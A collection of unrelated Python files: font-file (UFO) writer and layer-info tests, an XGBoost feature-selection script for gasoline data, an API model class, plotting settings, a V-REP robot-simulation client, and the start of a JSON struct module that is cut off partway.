with open(path, "rb") as f:
written = f.read()
self.assertEqual(text, written)
self.tearDownUFO()
# basic directory
path = "data/org.unifiedfontobject.writebytesdirectory/level1/level2/file.txt"
testBytes = b"test"
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeBytesToPath(path, testBytes)
path = os.path.join(self.dstDir, path)
self.assertEqual(os.path.exists(path), True)
with open(path, "rb") as f:
written = f.read()
self.assertEqual(testBytes, written)
self.tearDownUFO()
def testUFOWriterWriteFileToPath(self):
# basic file
path = "data/org.unifiedfontobject.getwritefile.txt"
writer = UFOWriter(self.dstDir, formatVersion=3)
fileObject = writer.getFileObjectForPath(path)
self.assertNotEqual(fileObject, None)
hasRead = hasattr(fileObject, "read")
self.assertEqual(hasRead, True)
fileObject.close()
self.tearDownUFO()
def testUFOWriterRemoveFile(self):
path1 = "data/org.unifiedfontobject.removefile/level1/level2/file1.txt"
path2 = "data/org.unifiedfontobject.removefile/level1/level2/file2.txt"
path3 = "data/org.unifiedfontobject.removefile/level1/file3.txt"
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeBytesToPath(path1, b"test")
writer.writeBytesToPath(path2, b"test")
writer.writeBytesToPath(path3, b"test")
self.assertEqual(os.path.exists(os.path.join(self.dstDir, path1)), True)
self.assertEqual(os.path.exists(os.path.join(self.dstDir, path2)), True)
self.assertEqual(os.path.exists(os.path.join(self.dstDir, path3)), True)
writer.removeFileForPath(path1)
self.assertEqual(os.path.exists(os.path.join(self.dstDir, path1)), False)
self.assertEqual(os.path.exists(os.path.dirname(os.path.join(self.dstDir, path1))), True)
self.assertEqual(os.path.exists(os.path.join(self.dstDir, path2)), True)
self.assertEqual(os.path.exists(os.path.join(self.dstDir, path3)), True)
writer.removeFileForPath(path2)
self.assertEqual(os.path.exists(os.path.dirname(os.path.join(self.dstDir, path1))), False)
self.assertEqual(os.path.exists(os.path.join(self.dstDir, path2)), False)
self.assertEqual(os.path.exists(os.path.join(self.dstDir, path3)), True)
writer.removeFileForPath(path3)
self.assertEqual(os.path.exists(os.path.join(self.dstDir, path3)), False)
self.assertEqual(os.path.exists(os.path.dirname(os.path.join(self.dstDir, path2))), False)
self.assertEqual(os.path.exists(os.path.join(self.dstDir, "data/org.unifiedfontobject.removefile")), False)
self.assertRaises(UFOLibError, writer.removeFileForPath, path="metainfo.plist")
self.assertRaises(UFOLibError, writer.removeFileForPath, path="data/org.unifiedfontobject.doesNotExist.txt")
self.tearDownUFO()
def testUFOWriterCopy(self):
sourceDir = self.dstDir.replace(".ufo", "") + "-copy source" + ".ufo"
dataPath = "data/org.unifiedfontobject.copy/level1/level2/file1.txt"
writer = UFOWriter(sourceDir, formatVersion=3)
writer.writeBytesToPath(dataPath, b"test")
# copy a file
reader = UFOReader(sourceDir)
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.copyFromReader(reader, dataPath, dataPath)
path = os.path.join(self.dstDir, dataPath)
self.assertEqual(os.path.exists(path), True)
self.tearDownUFO()
# copy a directory
reader = UFOReader(sourceDir)
writer = UFOWriter(self.dstDir, formatVersion=3)
p = "data/org.unifiedfontobject.copy"
writer.copyFromReader(reader, p, p)
path = os.path.join(self.dstDir, dataPath)
self.assertEqual(os.path.exists(path), True)
self.tearDownUFO()
# ---------------
# layerinfo.plist
# ---------------
class TestLayerInfoObject(object):
color = guidelines = lib = None
class UFO3ReadLayerInfoTestCase(unittest.TestCase):
def setUp(self):
self.tempDir = tempfile.mktemp()
os.mkdir(self.tempDir)
self.ufoPath = os.path.join(self.tempDir, "test.ufo")
def tearDown(self):
shutil.rmtree(self.tempDir)
def makeUFO(self, formatVersion=3, layerInfo=None):
self.clearUFO()
if not os.path.exists(self.ufoPath):
os.mkdir(self.ufoPath)
# metainfo.plist
metaInfo = dict(creator="test", formatVersion=formatVersion)
path = os.path.join(self.ufoPath, "metainfo.plist")
with open(path, "wb") as f:
writePlist(metaInfo, f)
# layercontents.plist
layerContents = [("public.default", "glyphs")]
path = os.path.join(self.ufoPath, "layercontents.plist")
with open(path, "wb") as f:
writePlist(layerContents, f)
# glyphs
glyphsPath = os.path.join(self.ufoPath, "glyphs")
os.mkdir(glyphsPath)
contents = dict(a="a.glif")
path = os.path.join(glyphsPath, "contents.plist")
with open(path, "wb") as f:
writePlist(contents, f)
path = os.path.join(glyphsPath, "a.glif")
with open(path, "w") as f:
f.write(" ")
# layerinfo.plist
if layerInfo is None:
layerInfo = dict(
color="0,0,0,1",
lib={"foo" : "bar"}
)
path = os.path.join(glyphsPath, "layerinfo.plist")
with open(path, "wb") as f:
writePlist(layerInfo, f)
def clearUFO(self):
if os.path.exists(self.ufoPath):
shutil.rmtree(self.ufoPath)
def testValidLayerInfo(self):
self.makeUFO()
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
info = TestLayerInfoObject()
glyphSet.readLayerInfo(info)
expectedColor = "0,0,0,1"
self.assertEqual(expectedColor, info.color)
expectedLib = {"foo": "bar"}
self.assertEqual(expectedLib, info.lib)
def testMissingLayerInfo(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "glyphs", "layerinfo.plist")
os.remove(path)
# read
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
info = TestLayerInfoObject()
glyphSet.readLayerInfo(info)
self.assertEqual(None, info.color)
self.assertEqual(None, info.guidelines)
self.assertEqual(None, info.lib)
def testBogusLayerInfo(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "glyphs", "layerinfo.plist")
os.remove(path)
with open(path, "w") as f:
f.write("test")
# read
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
info = TestLayerInfoObject()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, info)
def testInvalidFormatLayerInfo(self):
self.makeUFO()
path = os.path.join(self.ufoPath, "glyphs", "layerinfo.plist")
info = [("color", "0,0,0,0")]
with open(path, "wb") as f:
writePlist(info, f)
# read
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
info = TestLayerInfoObject()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, info)
def testColor(self):
## not a string
info = {}
info["color"] = 1
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
## not enough commas
info = {}
info["color"] = "1 0, 0, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "1 0 0, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "1 0 0 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
## not enough parts
info = {}
info["color"] = ", 0, 0, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "1, , 0, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "1, 0, , 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "1, 0, 0, "
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = ", , , "
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
## not a number in all positions
info = {}
info["color"] = "r, 1, 1, 1"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "1, g, 1, 1"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "1, 1, b, 1"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "1, 1, 1, a"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
## too many parts
info = {}
info["color"] = "1, 0, 0, 0, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
## < 0 in each position
info = {}
info["color"] = "-1, 0, 0, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "0, -1, 0, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "0, 0, -1, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "0, 0, 0, -1"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
## > 1 in each position
info = {}
info["color"] = "2, 0, 0, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "0, 2, 0, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "0, 0, 2, 0"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
info = {}
info["color"] = "0, 0, 0, 2"
self.makeUFO(layerInfo=info)
reader = UFOReader(self.ufoPath)
glyphSet = reader.getGlyphSet()
self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())
class UFO3WriteLayerInfoTestCase(unittest.TestCase):
def setUp(self):
self.tempDir = tempfile.mktemp()
os.mkdir(self.tempDir)
self.ufoPath = os.path.join(self.tempDir, "test.ufo")
def tearDown(self):
shutil.rmtree(self.tempDir)
def makeGlyphSet(self):
self.clearUFO()
writer = UFOWriter(self.ufoPath)
return writer.getGlyphSet()
def clearUFO(self):
if os.path.exists(self.ufoPath):
shutil.rmtree(self.ufoPath)
def testValidWrite(self):
expected = dict(
color="0,0,0,1",
lib={"foo" : "bar"}
)
info = TestLayerInfoObject()
info.color = expected["color"]
info.lib = expected["lib"]
glyphSet = self.makeGlyphSet()
glyphSet.writeLayerInfo(info)
path = os.path.join(self.ufoPath, "glyphs", "layerinfo.plist")
with open(path, "rb") as f:
result = readPlist(f)
self.assertEqual(expected, result)
def testColor(self):
## not a string
info = TestLayerInfoObject()
info.color = 1
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
## not enough commas
info = TestLayerInfoObject()
info.color = "1 0, 0, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "1 0 0, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "1 0 0 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
## not enough parts
info = TestLayerInfoObject()
info.color = ", 0, 0, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "1, , 0, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "1, 0, , 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "1, 0, 0, "
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = ", , , "
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
## not a number in all positions
info = TestLayerInfoObject()
info.color = "r, 1, 1, 1"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "1, g, 1, 1"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "1, 1, b, 1"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "1, 1, 1, a"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
## too many parts
info = TestLayerInfoObject()
info.color = "1, 0, 0, 0, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
## < 0 in each position
info = TestLayerInfoObject()
info.color = "-1, 0, 0, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "0, -1, 0, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "0, 0, -1, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "0, 0, 0, -1"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
## > 1 in each position
info = TestLayerInfoObject()
info.color = "2, 0, 0, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "0, 2, 0, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "0, 0, 2, 0"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
info = TestLayerInfoObject()
info.color = "0, 0, 0, 2"
glyphSet = self.makeGlyphSet()
self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)
if __name__ == "__main__":
from ufoLib.test.testSupport import runTests
runTests()
|
import numpy as np
import pandas as pd
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import MinMaxScaler, MaxAbsScaler, StandardScaler, Normalizer
from sklearn.feature_selection import VarianceThreshold, SelectKBest, RFE
from sklearn.model_selection import cross_val_score
from xgboost import XGBRegressor
def feature_select():
df = pd.read_excel("/Users/ashzerm/item/GasOline/data/stand_oline.xlsx")
target = np.array(df['RON_LOSS'].copy())
df.drop('RON_LOSS', axis=1, inplace=True)
df.drop('产品辛烷值RON', axis=1, inplace=True)
df.drop('产品硫含量', axis=1, inplace=True)
data = np.array(df)
estimator = XGBRegressor(learning_rate=0.1, n_estimators=100, max_depth=5)
selector = RFE(estimator=estimator, n_features_to_select=25)
selector.fit(data, target)
print("N_features {}".format(selector.n_features_))
print("Support is {}".format(selector.support_))
print("Ranking is {}".format(selector.ranking_))
print("选取的特征为: ", df.columns[selector.ranking_ == 1])
result = ['D121去稳定塔流量', '还原器温度', 'E-101D壳程出口管温度', 'D-204液位', 'D123冷凝水罐液位',
'D-123压力', 'D-121水液位', 'D-102温度', '原料汽油硫含量',
'TAG表和PID图未见PDI-2107点,是否为DI-2107', '稳定塔顶回流流量', '热循环气去R101底提升气管流量',
'空气预热器空气出口温度', '低压热氮气压力', 'R-101下部床层压降', 'R-101床层中部温度', 'R-101床层下部温度',
'P-101B入口过滤器差压', 'ME-109过滤器差压', 'ME-105过滤器压差', 'F-101辐射室出口压力',
'S_ZORB AT-0004', 'S_ZORB AT-0011', 'D-201含硫污水液位', 'D101原料缓冲罐压力']
if __name__ == '__main__':
feature_select()
|
# -*- coding: utf-8 -*-
class ConnectOauthOptionsCopy(object):
"""Implementation of the 'ConnectOAuthOptions - Copy' model.
oauthOptions for oauthEnabled institutions
Attributes:
enabled (bool): Indicates if OAuth institutions should be enabled for
the session
auto_replace (bool): If set to true, Connect will replace OAuth
institutions based on the customer's existing accounts. e.g if the
customer has a legacy Chase account, legacy Chase will be used
throughout the session but if the user doesn't have a Capital One
legacy account, OAuth Capital One will be used for the session.
institutions (object): Provides the ability to control what
institutions should or shouldn't be displayed to the user
"""
# Create a mapping from Model property names to API property names
_names = {
"enabled":'enabled',
"auto_replace":'autoReplace',
"institutions":'institutions'
}
def __init__(self,
enabled=None,
auto_replace=None,
institutions=None,
additional_properties = {}):
"""Constructor for the ConnectOauthOptionsCopy class"""
# Initialize members of the class
self.enabled = enabled
self.auto_replace = auto_replace
self.institutions = institutions
# Add additional model properties to the instance
self.additional_properties = additional_properties
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
enabled = dictionary.get('enabled')
auto_replace = dictionary.get('autoReplace')
institutions = dictionary.get('institutions')
# Clean out expected properties from dictionary
for key in cls._names.values():
if key in dictionary:
del dictionary[key]
# Return an object of this model
return cls(enabled,
auto_replace,
institutions,
dictionary)
|
params = {
'axes.labelsize': 12,
'font.size': 12,
'savefig.dpi': 1000,
'axes.spines.right': False,
'axes.spines.top': False,
'legend.fontsize': 12,
'xtick.labelsize': 12,
'ytick.labelsize': 12,
'text.usetex': False,
'legend.labelspacing': 1,
'legend.borderpad': 0.5,
'legend.borderaxespad': 0.5,
'axes.labelpad': 0,
'axes.linewidth': 0.4,
'patch.linewidth': 0.7,
'lines.linewidth': 1,
'lines.markersize': 8,
'font.family': 'serif',
'xtick.major.pad': 1.5,
'xtick.major.size': 2.5,
'xtick.major.width': 0.4,
'xtick.minor.pad': 1.2,
'xtick.minor.size': 1.5,
'xtick.minor.width': 0.3,
'ytick.major.pad': 1.5,
'ytick.major.size': 2.5,
'ytick.major.width': 0.4,
'ytick.minor.pad': 1.2,
'ytick.minor.size': 1.5,
'ytick.minor.width': 0.3,
'font.serif': ["Times New Roman"]
}
|
from __future__ import print_function
import logging
from compas_fab.backends.vrep.helpers import DEFAULT_OP_MODE
from compas_fab.backends.interfaces.client import ClientInterface
from compas_fab.backends.vrep import VrepError
from compas_fab.backends.vrep.helpers import assert_robot
from compas_fab.backends.vrep.helpers import config_from_vrep
from compas_fab.backends.vrep.helpers import config_to_vrep
from compas_fab.backends.vrep.helpers import floats_from_vrep
from compas_fab.backends.vrep.helpers import floats_to_vrep
from compas_fab.backends.vrep.helpers import resolve_host
from compas_fab.backends.vrep.planner import VrepPlanner
from compas_fab.backends.vrep.remote_api import vrep
DEFAULT_SCALE = 1.
CHILD_SCRIPT_TYPE = vrep.sim_scripttype_childscript
LOG = logging.getLogger('compas_fab.backends.vrep.client')
__all__ = [
'VrepClient',
]
class VrepClient(ClientInterface):
"""Interface to run simulations using VREP as
the engine for kinematics and path planning.
:class:`.VrepClient` is a context manager type, so it's best used in combination
with the ``with`` statement to ensure resource deallocation.
Args:
host (:obj:`str`): IP address or DNS name of the V-REP simulator.
port (:obj:`int`): Port of the V-REP simulator.
scale (:obj:`int`): Scaling of the model. Defaults to meters (``1``).
lua_script (:obj:`str`): Name of the LUA script on the V-REP scene.
debug (:obj:`bool`): True to enable debug messages, False otherwise.
Examples:
>>> from compas_fab.backends import VrepClient
>>> with VrepClient() as client:
... print ('Connected: %s' % client.is_connected)
Connected: True
Note:
For more examples, check out the :ref:`V-REP examples page <examples_vrep>`.
"""
def __init__(self, host='127.0.0.1', port=19997, scale=DEFAULT_SCALE, lua_script='RFL', debug=False):
super(VrepClient, self).__init__()
self.client_id = None
self.host = resolve_host(host)
self.port = port
self.default_timeout_in_ms = -50000000
self.thread_cycle_in_ms = 5
self.debug = debug
self.scale = float(scale)
self.lua_script = lua_script
self._added_handles = []
self.planner = VrepPlanner(self)
def __enter__(self):
# Stop existing simulation, if any
vrep.simxFinish(-1)
if self.debug:
LOG.debug('Connecting to V-REP on %s:%d...', self.host, self.port)
# Connect to V-REP, set a very large timeout for blocking commands
self.client_id = vrep.simxStart(self.host, self.port, True, True,
self.default_timeout_in_ms,
self.thread_cycle_in_ms)
# Start simulation
vrep.simxStartSimulation(self.client_id, DEFAULT_OP_MODE)
if self.client_id == -1:
raise VrepError('Unable to connect to V-REP on %s:%d' % (self.host, self.port), -1)
return self
def __exit__(self, *args):
# Stop simulation
vrep.simxStopSimulation(self.client_id, DEFAULT_OP_MODE)
# Close the connection to V-REP
vrep.simxFinish(self.client_id)
self.client_id = None
# Objects are removed by V-REP itself when simulation stops
self._added_handles = []
if self.debug:
LOG.debug('Disconnected from V-REP')
@property
def is_connected(self):
"""Indicates whether the client has an active connection.
Returns:
bool: True if connected, False otherwise.
"""
return self.client_id is not None and self.client_id != -1
def get_object_handle(self, object_name):
"""Gets the object handle (identifier) for a given object name.
Args:
object_name (:obj:`str`): Name of the object.
Returns:
int: Object handle.
"""
_res, handle = vrep.simxGetObjectHandle(self.client_id,
object_name,
DEFAULT_OP_MODE)
return handle
def get_object_matrices(self, object_handles):
"""Gets a dictionary of matrices keyed by object handle.
Args:
object_handles (:obj:`list` of :obj:`float`): List of object handles (identifiers)
to retrieve matrices from.
Returns:
dict: Dictionary of matrices represented by a :obj:`list` of 12 :obj:`float` values.
Examples:
>>> from compas_fab.backends import VrepClient
>>> with VrepClient() as client:
... matrices = client.get_object_matrices([0])
... print([int(i) for i in matrices[0]]) # doctest: +SKIP
[0, 0, 0, 19, 0, 0, 0, 10, 0, 0, 0, 6] # doctest: +SKIP
.. note::
The resulting dictionary is keyed by object handle.
"""
_res, _, matrices, _, _ = self.run_child_script('getShapeMatrices', object_handles, [], [])
return dict([(object_handles[i // 12], floats_from_vrep(matrices[i:i + 12], self.scale)) for i in range(0, len(matrices), 12)])
def get_all_visible_handles(self):
"""Gets a list of object handles (identifiers) for all visible
shapes of the 3D model.
Returns:
list: List of object handles (identifiers) of the 3D model.
"""
return self.run_child_script('getRobotVisibleShapeHandles', [], [], [])[1]
def set_robot_metric(self, group, metric_values):
"""Assigns a metric defining relations between axis values of a robot.
It takes a list containing one value per configurable joint. Each value
ranges from 0 to 1, where 1 indicates the axis is blocked and cannot
move during inverse kinematic solving. A value of 1 on any of these
effectively removes one degree of freedom (DOF).
Args:
robot (:class:`compas_fab.robots.Robot`): Robot instance.
metric_values (:obj:`list` of :obj:`float`): List containing one value
per configurable joint. Each value ranges from 0 to 1.
"""
vrep.simxCallScriptFunction(self.client_id,
self.lua_script,
CHILD_SCRIPT_TYPE, 'setTheMetric',
[group], metric_values, [],
bytearray(), DEFAULT_OP_MODE)
def set_robot_pose(self, robot, frame):
"""Moves the robot to a given pose, specified as a frame.
Args:
robot (:class:`compas_fab.robots.Robot`): Robot instance to move.
frame (:class:`Frame`): Target or goal frame.
Returns:
An instance of :class:`Configuration` found for the given pose.
"""
assert_robot(robot)
# First check if the start state is reachable
joints = len(robot.get_configurable_joints())
options = {
'num_joints': joints,
'metric_values': [0.] * joints,
}
config = self.inverse_kinematics(robot, frame, group=robot.model.attr['index'], options=options)[-1]
if not config:
raise ValueError('Cannot find a valid config for the given pose')
self.set_robot_config(robot, config)
return config
def set_robot_config(self, robot, config):
"""Moves the robot to the specified configuration.
Args:
robot (:class:`compas_fab.robots.Robot`): Robot instance to move.
config (:class:`Configuration` instance): Describes the position of the
robot as an instance of :class:`Configuration`.
Examples:
>>> from compas_fab.robots import *
>>> with VrepClient() as client:
... config = Configuration.from_prismatic_and_revolute_values([7.600, -4.500, -5.500],
... to_radians([90, 0, 0, 0, 0, -90]))
... client.set_robot_config(rfl.Robot('A'), config)
...
"""
assert_robot(robot)
if not config:
raise ValueError('Unsupported config value')
values = config_to_vrep(config, self.scale)
self.set_robot_metric(robot.model.attr['index'], [0.0] * len(config.values))
self.run_child_script('moveRobotFK',
[], values, ['robot' + robot.name])
def get_robot_config(self, robot):
"""Gets the current configuration of the specified robot.
Args:
robot (:class:`compas_fab.robots.Robot`): Robot instance.
Examples:
>>> from compas_fab.robots import *
>>> with VrepClient() as client:
... config = client.get_robot_config(rfl.Robot('A'))
Returns:
An instance of :class:`.Configuration`.
"""
assert_robot(robot)
_res, _, config, _, _ = self.run_child_script('getRobotState',
[robot.model.attr['index']],
[], [])
return config_from_vrep(config, self.scale)
def find_raw_robot_states(self, group, goal_vrep_pose, gantry_joint_limits, arm_joint_limits, max_trials=None, max_results=1):
i = 0
final_states = []
retry_until_success = True if not max_trials else False
while True:
string_param_list = []
if gantry_joint_limits or arm_joint_limits:
joint_limits = []
joint_limits.extend(floats_to_vrep(gantry_joint_limits or [], self.scale))
joint_limits.extend(arm_joint_limits or [])
string_param_list.append(','.join(map(str, joint_limits)))
res, _, states, _, _ = self.run_child_script('searchRobotStates',
[group,
max_trials or 1,
max_results],
goal_vrep_pose, string_param_list)
# Even if the retry_until_success is set to True, we short circuit
# at some point to prevent infinite loops caused by misconfiguration
i += 1
if i > 20 or (res != 0 and not retry_until_success):
raise VrepError('Failed to search robot states', res)
final_states.extend(states)
if len(final_states):
LOG.info('Found %d valid robot states', len(final_states) // 9)
break
else:
LOG.info('No valid robot states found, will retry.')
return final_states
def run_child_script(self, function_name, in_ints, in_floats, in_strings):
return vrep.simxCallScriptFunction(self.client_id,
self.lua_script,
CHILD_SCRIPT_TYPE, function_name,
in_ints, in_floats, in_strings,
bytearray(), DEFAULT_OP_MODE)
|
"""
=== SODI container objects prototype ===
version 1
All data is stored as text in json format. Helper functions and classes are
provided in this module together with usage documentation.
See also func calling demo at the end of this file.
*** Compatible with dbdict (dict with items accessible via attributes)
>>> x = Struct()
>>> x.field1 = 'test'
>>> x['field1']
'test'
*** Object can automatically be built from json, using class method from_json
>>> x = Struct.from_json('{"field2":42, "field3":{"field4":"foo"}}')
>>> x.field2
42
*** Struct data can be dumped to json using method dump_json
>>> x.dump_json()
'{"field2":42,"field3":{"field4":"foo"}}'
*** Sub dicts in json are automatically converted to Struct objects on creation
(note that string values are stored as unicode, that is the standard behaviour
of json)
>>> x.field3.field4 == 'foo'
True
*** Typed structs can be defined using simple class definition syntax. All fields
are instances of Field. Field types are given as arguments into Field initializator.
When no field type is given, no automatic type conversion takes place
>>> class X(Struct):
... name = Field(str)
... age = Field(int, default=42)
... blah = Field()
>>> x = X()
>>> x.name
''
>>> x.age
42
>>> type(x.blah)
<type 'NoneType'>
**** Structs are inheritable
>>> class Y(X):
... some_value = Field(float)
>>> y = Y()
>>> y.age
42
>>> y.some_value
0.0
*** New combined structs can be built by adding up base structs
>>> class A(Struct):
... name = Field(str, default = 'nobody')
>>> class B(Struct):
... age = Field(int, default = 11)
>>> AB = A + B
>>> ab=AB()
>>> ab.name
'nobody'
>>> ab['age']
11
*** Special "typed" list builder list_of is introduced with method new for
creating (and adding) new typed items
>>> class Item(Struct):
... key = Field(str)
... val = Field(int)
>>> class ItemContainer(Struct):
... name = Field(str)
... itemlist = Field(list_of(Item))
>>> x = ItemContainer(name = 'test')
>>> item = x.itemlist.new()
>>> item.key
''
>>> item.val
0
>>> item.key = 'test-test'
>>> item.val = 42
>>> x.itemlist[0].key
'test-test'
>>> item = x.itemlist.new(key=2, val='100')
>>> x.itemlist[1].val
100
>>> item.key
'2'
*** Helper function for struct building: build_struct. base structs inherit from
can be given as args and fields as keyword args. If ordinary type is used in
place of field, Field object is built automatically, using type as arg
>>> Foo = build_struct(name = Field(str, default='nobody'), age = int)
>>> foo = Foo()
>>> foo.name
'nobody'
>>> foo.age
0
>>> Foo1 = build_struct(Foo, data = build_struct(lines=list_of(build_struct(nr=int, line=str))))
>>> foo1 = Foo1()
>>> line = foo1.data.lines.new(nr=1, line='line1')
>>> foo1['data'].lines[0].line
'line1'
>>> foo1.name
'nobody'
"""
#from pdb import set_trace
__all__ = ['loads', 'dumps', 'Struct', 'build_struct', 'Field', 'list_of']
#===============================================================================
# Portable JSON import
#===============================================================================
import sys
# python2.5 'json' is crap, try simplejson first
try:
import simplejson as json
except ImportError:
# python tries to do relative import first, work around it
